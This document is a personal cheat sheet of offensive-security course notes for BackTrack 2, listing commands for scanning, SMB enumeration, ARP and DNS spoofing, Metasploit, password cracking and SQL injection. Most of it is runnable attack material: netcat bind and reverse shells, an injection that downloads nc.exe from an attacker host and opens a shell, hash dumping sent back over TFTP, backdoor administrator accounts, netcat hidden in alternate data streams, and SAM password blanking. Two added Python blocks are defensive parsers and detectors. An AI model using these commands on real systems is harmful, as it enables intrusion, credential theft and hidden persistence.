Scanning


scanrand -b10M targetIP:quick


nmap:

-sS        TCP SYN scan or Stealth, half open (default)
-sT        TCP full connect (very noisy)
-sU        UDP scan
-PS        SYN packet discovery (best against stateful firewalls)
-PA        ACK packet discovery (best against stateless firewalls)
-PN        don't ping
-n         no reverse DNS lookup
-A         combines -O and -sV
-O         OS fingerprinting
-sV        service version (banner)
-p         ports to scan (T:port,U:port)
-T         timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL        input list of hosts to scan
-oG        grepable output to a file


nmap -sS -PN -n targetIP

nmap -sU -PN -n targetIP

nmap -sT -PN -n targetIP -A -p <open ports> -T5 -oG scan.txt

nmap -sS -p 135,139,445 targetIP

nmap -sS -p T:1433,U:1434 targetIP


amap:

Take the results from nmap and check for services on uncommon ports.

amap -i scan.txt
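The scan.txt written by the nmap -oG line above is what amap consumes; the following is an added example (not part of the course notes) that parses that grepable format and reports which open ports fall outside an allow list, so exposed services can be reviewed before anything else is run. SAMPLE is a constructed -oG file; the hosts and ports in it are made up.

```python
"""Parse nmap grepable (-oG) output into the open ports per host.

Added example, not part of the course material. It reads the scan.txt that
the 'nmap ... -oG scan.txt' line above writes, so the exposed ports can be
reviewed against an allow list before the file is handed to amap. SAMPLE is
a constructed -oG file, not output from a real scan.
"""
import re

# Constructed sample: one "Host:" line per host; the "Ports:" field holds
# comma-separated entries of the form port/state/proto/owner/service/rpcinfo/version/.
SAMPLE = """# Nmap 4.20 scan initiated as: nmap -sS -sU -PN -n -oG scan.txt 10.1.1.1-2
Host: 10.1.1.1 ()\tStatus: Up
Host: 10.1.1.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (998)
Host: 10.1.1.2 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 1434/open|filtered/udp//ms-sql-m///\tIgnored State: closed (996)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

def parse_grepable(text):
    """Return {host: [(port, proto, service), ...]} for ports reported as open.

    Entries in state 'open|filtered' are skipped: nmap could not confirm them.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        m = re.search(r"Ports:\s*(.*?)(?:\t|$)", line)
        if not m:
            continue
        host = line.split()[1]
        for entry in m.group(1).split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5 or fields[1] != "open":
                continue
            hosts.setdefault(host, []).append((int(fields[0]), fields[2], fields[4]))
    return hosts

def unexpected_ports(hosts, allowed):
    """Return (host, port, proto, service) for every open port outside the allow list."""
    return [(h, p, pr, s) for h, ports in hosts.items()
            for p, pr, s in ports if p not in allowed]

if __name__ == "__main__":
    found = parse_grepable(SAMPLE)
    for host, ports in found.items():
        print(host, ports)
    print("outside allow list:", unexpected_ports(found, {22, 80}))
```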

Last modified:  11-2-08


Here are my personal notes from the Offensive-Security 101 course using BackTrack 2. This was an excellent course and I highly recommend taking it! As I learn more, I have decided to update this page with more info.


Table of Contents

Networking
Services
Basics
Footprinting
Scanning
Windows Enumeration
ARP Spoofing
Exploits
Metasploit Framework 3
What to do after gaining a remote shell
TFTP
Netcat
Passwords
Physical Access
SQL Injection
Alternate Data Streams
A White Hat's Pen Test


Networking


dhcpcd                                          get a new IP address

Renew dynamic IP address:

dhcpcd -k                                       release IP address
ifconfig eth0 up                                bring up the NIC
dhcpcd                                          get a new IP address

Static IP address:

ifconfig eth0 192.168.0.100/24                  set IP address & subnet mask
route add default gw 192.168.0.1                set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf  set DNS server


Services


Apache server:

apachectl start                                 start server on TCP port 80
apachectl stop                                  stop server

SSH server:

sshd-generate                                   generate ssh keys
/usr/sbin/sshd                                  start server on TCP port 22
pkill sshd                                      stop server
ssh user@targetIP

TFTP server:

atftpd --daemon --port 69 /tmp/                 start server on UDP port 69 with a root directory of /tmp
pkill tftpd                                     stop server

VNC server:

vncserver                                       start server on TCP port 5901
pkill Xvnc                                      stop server

Check what ports are listening:

netstat -ant                                    show listening TCP ports
netstat -anu                                    show listening UDP ports
netstat -ant | grep 22                          verify ssh has started
netstat -anu | grep 69                          verify tftp has started


Basics


Mount a local hard drive:

mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1

Mount a Windows network share:

share <user> <targetIP> <remote share>
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share                               umount share

Edit a file:

nano test.sh                                    create a new file and open it
<ctrl> x                                        exit
y                                               save modified buffer
<enter>                                         write changes
chmod 755 test.sh                               make the file executable
./test.sh                                       run the file

Compile a program:

gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom

Install a new program:

tar zxvf program.tar.gz
method 2:  bzip2 -cd program.tar.bz2 | tar xvf -
cd to the new program folder
./configure
make
su root
make install


Footprinting


Whois:

whois target.com                                contact info, emails, dates, name servers
ping www.target.com                             IP address of web server
whois targetIP                                  network range

DNS:

dig target.com any

A       host                  maps a domain to an IP address
PTR     pointer               maps an IP address to a domain
NS      name server           server name for a delegated zone
SOA     start of authority    zone transfer and record caching
SRV     service locator       used to locate services in the network
MX      mail                  SMTP server

host -l target.com <name server>                zone transfer

Online tools:

CentralOps
DNSstuff
ServerSniff
Netcraft

OS Fingerprinting:

p0f -i eth0 -U -p                               use interface eth0, don't display unknown signatures, promiscuous
point a browser to the targetIP                 read traffic on p0f

xprobe2 -B targetIP

Banner Grabbing:

nc targetIP port                                check if the port is open
nc 10.1.1.2 80

telnet targetIP port                            telnet may yield slightly different results
HEAD / HTTP/1.0
<enter 2x>

wget targetIP                                   downloads the index.html file
cat index.html | more                           view file one page at a time, space bar for next page
q                                               exit file


Windows Enumeration


nmap -sS -p 139,445 targetIP

cd /pentest/enumeration/smb-enum
nbtscan -f targetIP                             check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP                    name, OS and workgroup
smbdumpusers -i targetIP                        list users
smbclient -L //targetIP                         list shares

Using Windows:

net use \\targetIP\ipc$ "" /u:""                start a NULL session
net view \\targetIP                             view shares

smbclient:

smbclient -L hostName -I targetIP               enumerate shares
smbclient //hostName/share -U ""                connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin      connect to open share with user name admin

rpcclient:

rpcclient targetIP -U ""                        start a NULL session
netshareenum                                    enumerate shares
enumdomusers                                    enumerate users
lsaenumsid                                      enumerate domain SIDs
queryuser RID                                   user info, try 500, 501, 1000, 1001
createdomuser                                   create user account


ARP Spoofing


ettercap:

nano /usr/local/etc/etter.conf

Under the Linux section, uncomment both lines under iptables.

Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0

DNS spoofing:

nano /usr/local/share/ettercap/etter.dns

Edit the Microsoft lines (target URL) to redirect to the attacker.

Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing


Exploits


cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i exploit

Some versions may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers.

cat exploit | grep "#include"

Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h
Linux:    arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u


Metasploit Framework 3


svn update                                      update modules

Web Interface:

./msfweb                                        open a browser to 127.0.0.1:55555

Console:

./msfconsole
help
show exploits                                   show all exploits
search <name>                                   search for an exploit

use <exploit name>
show options
set <OPTION NAME> <option>                      set RHOST 10.1.1.2
show payloads
set PAYLOAD <payload name>
show options
set <OPTION NAME> <option>                      set LHOST 10.1.1.1
show targets
set TARGET <target number>                      set TARGET 0
exploit                                         you may need to run exploit more than once to work

sessions -l                                     list sessions
sessions -i <id>                                sessions -i 4, interact with session 4
<ctrl> z                                        detach from session
<ctrl> c                                        kill a session
jobs                                            list exploit jobs running
jobs -K                                         kill all jobs

Auxiliary scanners:

show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run

scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login

Payloads:

Attacker behind firewall:  bind shell
Target behind firewall:  reverse shell


Meterpreter


Automated:

db_import_nessus_nbe                            import Nessus results in NBE format
db_import_nmap_xml                              import nmap results in XML format (-oX)

./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP                                run nmap through the framework and store results in database
db_hosts                                        show hosts discovered
db_services                                     show services running on each host
db_autopwn                                      show options
db_autopwn -t -p -e                             select modules based on open ports, show matching exploits, exploit

Command Line Interface:

./msfcli | grep -i <name>                       search for an exploit or auxiliary
./msfcli <exploit or auxiliary> S               summary info
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

Payload generator:

./msfpayload <payload> <variable=value> <output type>

S        summary and options of payload
C        C language
P        Perl
y        Ruby
R        Raw, allows payload to be piped into msfencode and other tools
J        JavaScript
X        executable (Windows only)

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

Encode shellcode:

./msfencode <options> <variable=value>

Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l

Choose the PexFnstenvMor encoder and format the output to C.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c


What to do after gaining a remote shell


hostname                                        name of computer
net users                                       list users
net user x hack /add                            add user "x" with password "hack"
net user x /add                                 add user "x" with NO password
net localgroup                                  list security groups
net localgroup administrators                   list users in Administrators group
net localgroup administrators x /add            add user "x" to Administrators group

Don't use interactive programs like FTP from a remote shell.


TFTP


attack box 10.1.1.2

cp /pentest/windows-binaries/tools/nc.exe /tmp/

target box

tftp -i 10.1.1.2 GET nc.exe

TFTP copies files with read only attributes. So to delete the file:

attrib -r nc.exe
del nc.exe


Netcat


attacker:  10.1.1.1
target:  10.1.1.2

Port scanner:

nc -v -z 10.1.1.2 1-1024                        scan ports 1 to 1024

Chat session:

target:  nc -lvp 4444                           start Netcat and listen verbosely on port 4444
attacker:  nc -v 10.1.1.2 4444

Transfer file to target:

target:  nc -lvp 4444 > output.txt
attacker:  nc -v 10.1.1.2 4444 < test.txt

Bind shell:

target:  nc -lvp 4444 -e cmd.exe
attacker:  nc -v 10.1.1.2 4444                  should be sitting at a command prompt of the target

Reverse shell:

target:  nc -lvp 4444
attacker:  nc -v 10.1.1.2 4444 -e /bin/bash

The target should be sitting at an invisible command prompt of the attacker. You will not see a prompt. Issue any linux command to verify.


Passwords


Word list:

zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l                               About 306,000 passwords.

Brute force:

ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp

pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3

snmp
hydra -P words -v targetIP snmp

Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP

WYD:

Use wget to download specific files.

wget -r www.target.com --accept=pdf
wyd.pl -o output.txt www.target.com/
cat output.txt | more

SAM file:

%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair                             backup copy not locked by the OS

Dumping hashes:

./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x                        where x is the channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1

John the Ripper:

Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt

Rainbow Tables:

rcrack *.rt -f hash.txt                         -f switch will read pwdump files

Before you begin, change your root password using passwd.


SQL Injection


Oracle:
nmap -sS -p 1521 targetIP

MS SQL:
nmap -sS -p T:1433,U:1434 targetIP

version of Sqlservr.exe    Release
2000.80.194.0              SQL Server 2000 RTM
2000.80.384.0              SQL Server 2000 SP1
2000.80.534.0              SQL Server 2000 SP2
2000.80.760.0              SQL Server 2000 SP3
2000.80.760.0              SQL Server 2000 SP3a
2000.80.00.2039            SQL Server 2000 SP4
2005.90.1399               SQL Server 2005 RTM
2005.90.2047               SQL Server 2005 SP1
2005.90.3042               SQL Server 2005 SP2

Authentication bypass:

' or 1=1--                                      minus minus closes the SQL query, everything after it is ignored

Enumerating table names:

' having 1=1--
' group by table having 1=1--
' group by table, table2 having 1=1--
' group by table, table2, table3 having 1=1--

Enumerating column types:

union select sum(column) from table --
union select sum(column2) from table --

Adding data:

' ; insert into table values('value','value2','value3')--

MS SQL stored procedure:

Output the database info into an html file that you can view with a browser.

' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --

www.target.com/test.html

Run ipconfig on the target and write the output to a file that you can view with a browser.

' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--

www.target.com/test.txt

Upload netcat and spawn a reverse shell.

' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --

attacker:  nc -lvp 53
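The injection strings in the SQL Injection section above are easy to pick out of a web server's access log once the request is URL-decoded. The following is an added example (not part of the course notes) that does that for Apache-style combined-log lines; LOG_LINES are constructed entries, and the pattern names are my own labels.

```python
"""Flag web requests that carry the MS SQL injection strings from these notes.

Added example, not part of the course material: a detector a defender can run
over web server access logs. Each request is URL-decoded and checked for the
markers used in the injection lines above (' or 1=1--, having 1=1--,
union select sum(), sp_makewebtask, xp_cmdshell). LOG_LINES are constructed.
"""
import re
from urllib.parse import unquote_plus

# Matched against the lower-cased, URL-decoded request target.
PATTERNS = {
    "auth_bypass": re.compile(r"'\s*or\s+1\s*=\s*1\s*--"),
    "table_enum": re.compile(r"'\s*(group\s+by\s+[\w,\s]+)?having\s+1\s*=\s*1\s*--"),
    "column_probe": re.compile(r"union\s+select\s+sum\("),
    "stored_proc": re.compile(r"\b(sp_makewebtask|xp_cmdshell)\b"),
}

LOG_LINES = [  # constructed sample entries, not real traffic
    '10.1.1.1 - - [02/Nov/2008:10:00:01 -0500] "GET /login.asp?user=admin&pass=secret HTTP/1.0" 200 512',
    '10.1.1.1 - - [02/Nov/2008:10:00:07 -0500] "GET /login.asp?user=%27+or+1%3D1--&pass=x HTTP/1.0" 200 2048',
    '10.1.1.1 - - [02/Nov/2008:10:00:19 -0500] "GET /products.asp?id=1%27+having+1%3D1-- HTTP/1.0" 500 311',
    '10.1.1.1 - - [02/Nov/2008:10:00:31 -0500] "POST /search.asp HTTP/1.0" 200 410',
    '10.1.1.1 - - [02/Nov/2008:10:00:44 -0500] "GET /products.asp?id=1%27%3B+exec+master..xp_cmdshell+%27ipconfig%27%3B-- HTTP/1.0" 500 311',
]

def decode_request(line):
    """Return the URL-decoded request target from a combined-log line, or None."""
    m = re.search(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/', line)
    return unquote_plus(m.group(1)) if m else None

def classify(line):
    """Return the names of every injection pattern found in one log line."""
    target = decode_request(line)
    if target is None:
        return []
    return [name for name, rx in PATTERNS.items() if rx.search(target.lower())]

def scan_log(lines):
    """Return (line_number, matched_patterns) for each line that triggers a pattern."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan_log(LOG_LINES):
        print(f"line {number}: {', '.join(found)}")
```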


A White Hat's Pen Test by Muts


nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords.
Find the internal mail server in the config file.
nc -n internalserver.com 80
Edit the config file to open more ports on the router: 135, 139, 445, 1000
Use Metasploit to send the RPC exploit.
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1 > hashes.txt
tftp -i attackIP PUT hashes.txt
Crack the hashes with a rainbow table.
Use Remote Desktop to connect to the server.


Alternate Data Streams


Hide netcat inside a text file. Note that netcat must be located in the current directory.

echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start .\test.txt:nc.exe


Physical Access


Mount an NTFS partition in read/write mode:

Boot your box with Backtrack.

mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1

Dump the SAM file:

bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt

Modify the SAM file directly:

chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password.  *
Do you really wish to change it?  y
Write hive files?  y
umount /mnt/sda1
reboot